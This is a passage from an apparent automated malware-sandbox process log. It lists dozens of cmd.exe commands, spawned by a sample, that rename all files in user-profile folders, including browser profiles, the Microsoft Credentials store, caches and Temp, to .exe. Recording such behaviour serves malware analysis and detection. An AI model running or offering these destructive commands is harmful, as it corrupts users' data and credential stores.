  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons\*.*" "*.exe"
  2⤵
  PID:1796
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Maskable\*.*" "*.exe"
  2⤵
  PID:1660
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\mpnpojknpmmopombnjdcgaaiekajbnjb\Icons Monochrome\*.*" "*.exe"
  2⤵
  PID:628
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Subresource Filter\Unindexed Rules\*.*" "*.exe"
  2⤵
  PID:1908
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Credentials\*.*" "*.exe"
  2⤵
  PID:760
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\*.*" "*.exe"
  2⤵
  PID:1644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\*.*" "*.exe"
  2⤵
  PID:2592
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\*.*" "*.exe"
  2⤵
  PID:2304
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\*.*" "*.exe"
  2⤵
  PID:784
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\*.*" "*.exe"
  2⤵
  PID:2252
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\PlayReady\*.*" "*.exe"
  2⤵
  PID:2936
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\*.*" "*.exe"
  2⤵
  PID:2460
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\*.*" "*.exe"
  2⤵
  PID:596
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Media\*.*" "*.exe"
  2⤵
  PID:1488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\*.*" "*.exe"
  2⤵
  PID:1400
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\*.*" "*.exe"
  2⤵
  PID:448
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\Feeds for United States~\*.*" "*.exe"
  2⤵
  PID:964
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\Microsoft Feeds~\*.*" "*.exe"
  2⤵
  PID:2308
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds\{5588ACFD-6436-411B-A5CE-666AE6A92D3D}~\WebSlices~\*.*" "*.exe"
  2⤵
  PID:1328
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\0TFOLVCB\*.*" "*.exe"
  2⤵
  PID:624
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\0TQH434S\*.*" "*.exe"
  2⤵
  PID:480
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2WD6IYSB\*.*" "*.exe"
  2⤵
  PID:2084
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\MAOUTFV0\*.*" "*.exe"
  2⤵
  PID:2148
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\MO0EVTEO\*.*" "*.exe"
  2⤵
  PID:2980
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\P78YEUVS\*.*" "*.exe"
  2⤵
  PID:960
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\SMKVA4ZP\*.*" "*.exe"
  2⤵
  PID:1780
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\XNFVO2P8\*.*" "*.exe"
  2⤵
  PID:568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\IECompatData\*.*" "*.exe"
  2⤵
  PID:2576
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\*.*" "*.exe"
  2⤵
  PID:2016
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\*.*" "*.exe"
  2⤵
  PID:2036
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\TabRoaming\*.*" "*.exe"
  2⤵
  PID:1732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\*.*" "*.exe"
  2⤵
  PID:2540
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tracking Protection\*.*" "*.exe"
  2⤵
  PID:1616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\b5orqwt\*.*" "*.exe"
  2⤵
  PID:1040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\*.*" "*.exe"
  2⤵
  PID:2020
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\*.*" "*.exe"
  2⤵
  PID:2772
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Last Active\*.*" "*.exe"
  2⤵
  PID:2904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin-2845162440\*.*" "*.exe"
  2⤵
  PID:2644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Tiles\pin9728060290\*.*" "*.exe"
  2⤵
  PID:2944
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\*.*" "*.exe"
  2⤵
  PID:2788
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\*.*" "*.exe"
  2⤵
  PID:2616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\00005475\*.*" "*.exe"
  2⤵
  PID:2828
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\*.*" "*.exe"
  2⤵
  PID:2868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\System\*.*" "*.exe"
  2⤵
  PID:1712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Office\Groove\User\*.*" "*.exe"
  2⤵
  PID:544
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\*.*" "*.exe"
  2⤵
  PID:1236
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Caches\*.*" "*.exe"
  2⤵
  PID:2348
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\*.*" "*.exe"
  2⤵
  PID:768
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\GameExplorer\*.*" "*.exe"
  2⤵
  PID:2344
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\*.*" "*.exe"
  2⤵
  PID:2712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Ringtones\*.*" "*.exe"
  2⤵
  PID:904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\*.*" "*.exe"
  2⤵
  PID:1416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\WebCache\*.*" "*.exe"
  2⤵
  PID:1808
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\*.*" "*.exe"
  2⤵
  PID:2796
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\History.IE5\*.*" "*.exe"
  2⤵
  PID:2288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\History\Low\*.*" "*.exe"
  2⤵
  PID:580
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\*.*" "*.exe"
  2⤵
  PID:852
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\*.*" "*.exe"
  2⤵
  PID:1172
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Virtualized\*.*" "*.exe"
  2⤵
  PID:1116
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\52FOIFWV\*.*" "*.exe"
  2⤵
  PID:1400
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\6IJYZ6B5\*.*" "*.exe"
  2⤵
  PID:2416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F3BH80GA\*.*" "*.exe"
  2⤵
  PID:1568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\FIEDGG3E\*.*" "*.exe"
  2⤵
  PID:1212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LFLWQ602\*.*" "*.exe"
  2⤵
  PID:2316
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\LFTKP12M\*.*" "*.exe"
  2⤵
  PID:1428
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\OZ66ZEGB\*.*" "*.exe"
  2⤵
  PID:2120
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TQO7542V\*.*" "*.exe"
  2⤵
  PID:480
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\*.*" "*.exe"
  2⤵
  PID:1064
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\*.*" "*.exe"
  2⤵
  PID:2148
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new\*.*" "*.exe"
  2⤵
  PID:1876
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\*.*" "*.exe"
  2⤵
  PID:1888
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Microsoft\Windows Sidebar\Gadgets\*.*" "*.exe"
  2⤵
  PID:1620
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\*.*" "*.exe"
  2⤵
  PID:2524
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\*.*" "*.exe"
  2⤵
  PID:2656
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.Admin\*.*" "*.exe"
  2⤵
  PID:2872
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\*.*" "*.exe"
  2⤵
  PID:2916
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\cache2\*.*" "*.exe"
  2⤵
  PID:2904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\safebrowsing\*.*" "*.exe"
  2⤵
  PID:2732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\settings\*.*" "*.exe"
  2⤵
  PID:2792
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\startupCache\*.*" "*.exe"
  2⤵
  PID:2680
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\thumbnails\*.*" "*.exe"
  2⤵
  PID:1712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\cache2\doomed\*.*" "*.exe"
  2⤵
  PID:1660
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\cache2\entries\*.*" "*.exe"
  2⤵
  PID:1236
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\settings\main\*.*" "*.exe"
  2⤵
  PID:1692
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\settings\main\ms-language-packs\*.*" "*.exe"
  2⤵
  PID:1896
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\settings\main\ms-language-packs\browser\*.*" "*.exe"
  2⤵
  PID:904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\jfsqt8yb.default-release\settings\main\ms-language-packs\browser\newtab\*.*" "*.exe"
  2⤵
  PID:1416
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\2567777158\*.*" "*.exe"
  2⤵
  PID:1900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\FD9.tmp\*.*" "*.exe"
  2⤵
  PID:2096
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\hsperfdata_Admin\*.*" "*.exe"
  2⤵
  PID:1532
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\Low\*.*" "*.exe"
  2⤵
  PID:2412
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x64 Redistributable Setup_10.0.40219\*.*" "*.exe"
  2⤵
  PID:856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\Microsoft Visual C++ 2010 x86 Redistributable Setup_10.0.40219\*.*" "*.exe"
  2⤵
  PID:312
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\mozilla-temp-files\*.*" "*.exe"
  2⤵
  PID:1664
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\scoped_dir2056_789028685\*.*" "*.exe"
  2⤵
  PID:1008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\WPDNSE\*.*" "*.exe"
  2⤵
  PID:1820
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\FD9.tmp\BUG32\*.*" "*.exe"
  2⤵
  PID:2588
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\scoped_dir2056_789028685\CRX_INSTALL\*.*" "*.exe"
  2⤵
  PID:2560
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\*.*" "*.exe"
  2⤵
  PID:1192
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Mozilla\*.*" "*.exe"
  2⤵
  PID:1044
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\*.*" "*.exe"
  2⤵
  PID:1248
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\*.*" "*.exe"
  2⤵
  PID:968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\*.*" "*.exe"
  2⤵
  PID:2504
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\*.*" "*.exe"
  2⤵
  PID:1552
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\*.*" "*.exe"
  2⤵
  PID:2480
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\*.*" "*.exe"
  2⤵
  PID:1604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\*.*" "*.exe"
  2⤵
  PID:2436
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\*.*" "*.exe"
  2⤵
  PID:2544
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\jdk1.7.0_80_x64\*.*" "*.exe"
  2⤵
  PID:2008
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\*.*" "*.exe"
  2⤵
  PID:2520
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\security\*.*" "*.exe"
  2⤵
  PID:1288
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\*.*" "*.exe"
  2⤵
  PID:2744
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\0\*.*" "*.exe"
  2⤵
  PID:2040
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\1\*.*" "*.exe"
  2⤵
  PID:2748
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\10\*.*" "*.exe"
  2⤵
  PID:2180
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\11\*.*" "*.exe"
  2⤵
  PID:2804
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\12\*.*" "*.exe"
  2⤵
  PID:2904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\13\*.*" "*.exe"
  2⤵
  PID:2856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\14\*.*" "*.exe"
  2⤵
  PID:2648
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\15\*.*" "*.exe"
  2⤵
  PID:1320
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\16\*.*" "*.exe"
  2⤵
  PID:3068
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\17\*.*" "*.exe"
  2⤵
  PID:2732
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\18\*.*" "*.exe"
  2⤵
  PID:2488
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\19\*.*" "*.exe"
  2⤵
  PID:3052
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\2\*.*" "*.exe"
  2⤵
  PID:2912
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\20\*.*" "*.exe"
  2⤵
  PID:1968
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\21\*.*" "*.exe"
  2⤵
  PID:1908
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\22\*.*" "*.exe"
  2⤵
  PID:2600
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\23\*.*" "*.exe"
  2⤵
  PID:2684
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\24\*.*" "*.exe"
  2⤵
  PID:1636
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\25\*.*" "*.exe"
  2⤵
  PID:2344
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\26\*.*" "*.exe"
  2⤵
  PID:688
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\27\*.*" "*.exe"
  2⤵
  PID:904
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\28\*.*" "*.exe"
  2⤵
  PID:2564
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\29\*.*" "*.exe"
  2⤵
  PID:1900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\3\*.*" "*.exe"
  2⤵
  PID:1752
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\30\*.*" "*.exe"
  2⤵
  PID:1532
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\31\*.*" "*.exe"
  2⤵
  PID:1816
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\32\*.*" "*.exe"
  2⤵
  PID:856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\33\*.*" "*.exe"
  2⤵
  PID:312
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\LocalLow\Sun\Java\Deployment\cache\6.0\34\*.*" "*.exe"
  2⤵
  PID:1664
- C:\Windows\System32\cmd.exe
